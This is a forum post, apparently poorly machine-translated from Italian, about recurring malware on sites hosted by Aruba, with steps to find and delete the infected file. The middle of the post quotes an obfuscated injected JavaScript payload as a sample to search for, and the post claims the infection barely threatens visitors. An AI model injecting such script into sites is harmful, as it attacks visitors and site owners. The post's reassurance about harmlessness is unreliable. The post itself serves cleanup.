www.argio-logic.net

[gabriele]

The advise that you may receive in the forum is not dangerous
I already cleaned the files, but google takes time to repeat the control
just ignore it.

this is the explanation:
Is not the first time this has happened and is not the first time that Aruba trashes some support ticket too. Perhaps it is not tied strictly to Aruba, but how is it that the majority of infected sites residing on their Linux or Windows hosting of this service?
It had already happened long ago. Many webmasters stressed by constant infection to their sites and then ... it was not WordPress, was not an enemy ... it was
just Aruba. Now the infection comes back and uploads new victim (but clean!), Sends a warning to those who like me can use such hosting.
It's called security_update and is a string without that, no one knows how God's grace, the most common file haunts Wordpress or php. Is identified as malware by few antivirus (Antivir Free-AV recognizes him for years to this part) and - at least in practice - not to harm your PC. Leaves with a clean temporary data then in the end is not as "host" for navigators.
What threatens the navigator? Almost nothing. If you're lucky its antivirus UNDERSTAND miss him.
What threatens the webmaster? Much. If Google identifies the site as infected (using "Google webmaster tools" if you do) you're in .... "Shit" you can say about uploads? Risk of losing 90% of visits and fall down ... like Chrome Browser (you put bad) or Safari could block the entrance to your site. The SEO then loses quality and Google .. Well so much you do not want.
How to recognize? At 100% open your site using Antivir Free-AV with Internet Explorer (see a little!). The antivirus detects it in the temporary and will report the infected file.
How to remove it? Take note of the infected file. If we speak of a file. Php and. Js usually lives in theme / theme folder. Open FileZilla and download the infected file that your antivirus reports. Open it with the block-note and look for a string absurd ... like this:

<script language="javascript">function t(){return z($a);}var
$a="Z64aZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2
520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257
FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520
Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3e
aeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3
eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy
~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxy
vdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z
22;ccZ3dZ225ngZ2574h;Z2569++Z2529Z257btmpZ253dds.sZ256cicZ25
65Z2528Z2569,iZ252b1)Z253bsZ22;cdZ3dZ22Z2574Z253dsZ2574+StZ2
572inZ2567.frZ256fZ256dZ2543haZ2572CodZ2565((Z2574Z256dp.Z22
;caZ3dZ22Z2566unZ2563tioZ256e dcZ2573(dZ2573,Z2565s)Z257bdsZ
253duZ256eZ2565Z2573caZ2570Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2
564csZ2528cu,Z25314)Z2529;Z2522;Z22;czZ3dZ22Z2566Z2575nctZ25
69onZ2520cz(Z2563zZ2529Z257bretZ2575rn Z2563aZ252bcbZ252bcc+
Z2563Z2564Z252bZ2563e+cZ257a;};Z22;dbZ3dZ227FtuQd8!90;0!Z252
00;
Delete it, then - in theory - that's it. Remember to change password on the FTP site Aruba.it
If the infection resides in a file. Htm or. Html Please re-download the WordPress official website and sovrascrivilo. What to do next? If I understand correctly the hackers are targeting a site like wildfire infected sites residing on the same server (multiple IP Aruba there are in fact more different sites). My advice is to constantly monitor your site using free-av or to follow other recommendations, like those of Julius.